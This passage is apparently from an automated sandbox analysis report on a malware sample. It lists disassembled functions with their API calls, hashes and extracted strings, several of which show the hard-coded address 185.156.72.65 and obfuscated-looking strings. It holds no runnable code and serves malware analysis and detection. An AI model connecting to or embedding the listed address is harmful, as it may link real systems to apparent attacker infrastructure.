                      • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                      Function 00410F1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                      Download Yara Rule
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                      • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                      Function 004095D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                      Download Yara Rule
                      APIs
                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                      • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                      • String ID: vector too long
                      • API String ID: 3646673767-2873823879
                      • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                      • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                      Function 0495BA67 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                      Download Yara Rule
                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0495BAA6
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0495BB5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 3480331319-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: 0e7c3944bde18a15751221af0c1f39edf172653e307827899b3639b505ec047c
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 6C41A134E00219AFDF10DF68C884AAEBBF5AF45328F248175EC14AB365D771BA05CB91
                      Function 0040C0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                      Function 0495C307 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 0495C32C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: 469ca81cc88efd7d276d9fe38d2634b47bf2dc2cc48431cd51c1df6cbec78555
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: BD412872900209AFDF16DF98C981EEEBBB9BF48304F248169FD15A7225D335A950DF50
                      Function 00401000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401084
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                      • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                      Function 00401110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401194
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                      • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                      Function 00401220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004012A4
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                      • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                      Function 04951487 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 0495150B
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction ID: b68f67b4c00690e181e770163d78a84ca3d00b31a65fe517a41e0cacc1b0a450
                      • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction Fuzzy Hash: 6521D4B4F002059AEB24EFB8E9157A87BB0AF05308FA141B9C9239B2B1D7756506CB59
                      Function 04951267 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 049512EB
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction ID: 9e702a3d0036c6607689573dba1b7483ecbe6d04646fe19d8000a92ab8bf8a80
                      • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction Fuzzy Hash: 5A2137B0F00245DEEB14EFA8E9167A87BB0EB01308FA00179D84567360D7B56549CB5D
                      Function 04951377 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 049513FB
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction ID: a02c709b0203582cfdba942107a8ff52fd0862dd8be4265b390dd0447ed87fa5
                      • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction Fuzzy Hash: 9321F5B0F00244DAEB24EFA4E9257A87BB0EF41308FA002B9DC055B260D7B56545CB59
                      Function 00408480 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004084EE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                      • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                      Function 00407E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407EEE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                      • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                      Function 049586E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04958755
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction ID: b6d9e5f69eea9796bea2d87498c86624bd5840650b0f6347fdc5e806259f9cb9
                      • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction Fuzzy Hash: 4D01D6B0F00244DFDB10EFB8AC41969B7B0A759314BB00679D936AB2A0DB75B9058B45
                      Function 049580E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04958155
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction ID: 70e303a494107c807b5c4bbdc7990226a0e9e82326240ab6145931cc99123ab7
                      • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction Fuzzy Hash: 0001D6F1F41204DBE720EFA8AC41A69B7B0AB59314FB006B9E91957370DB3568458B45
                      Function 00407830 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407899
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$A@K.
                      • API String ID: 2296764815-2457859030
                      • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                      • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                      Function 00407940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004079A9
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$ZYA.
                      • API String ID: 2296764815-4236202813
                      • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                      • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                      Function 00406DD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406E39
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: ZF\K$three
                      • API String ID: 2296764815-3094064056
                      • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                      • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                      Function 04957037 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 049570A0
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: ZF\K$three
                      • API String ID: 4132704954-3094064056
                      • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction ID: 60cf2a7dc68a29c70edabd6d98aedb78c32db83a2db6c897080f8ef949d90416
                      • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction Fuzzy Hash: BF016974F04208EBDB20DFE9E981B4CB3B0AB54754FB041BADD15A73A0D6746A06DB19
                      Function 04957A97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04957B00
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$A@K.
                      • API String ID: 4132704954-2457859030
                      • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction ID: 38221bc8e8a54746fba994961db8364b5d67c5f54a5ce43662c162bd3be8d830
                      • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction Fuzzy Hash: 320181B0F00204DFD720DFA8E946A5C77B0E749304FB001BADD16A73A0D775AA458B59
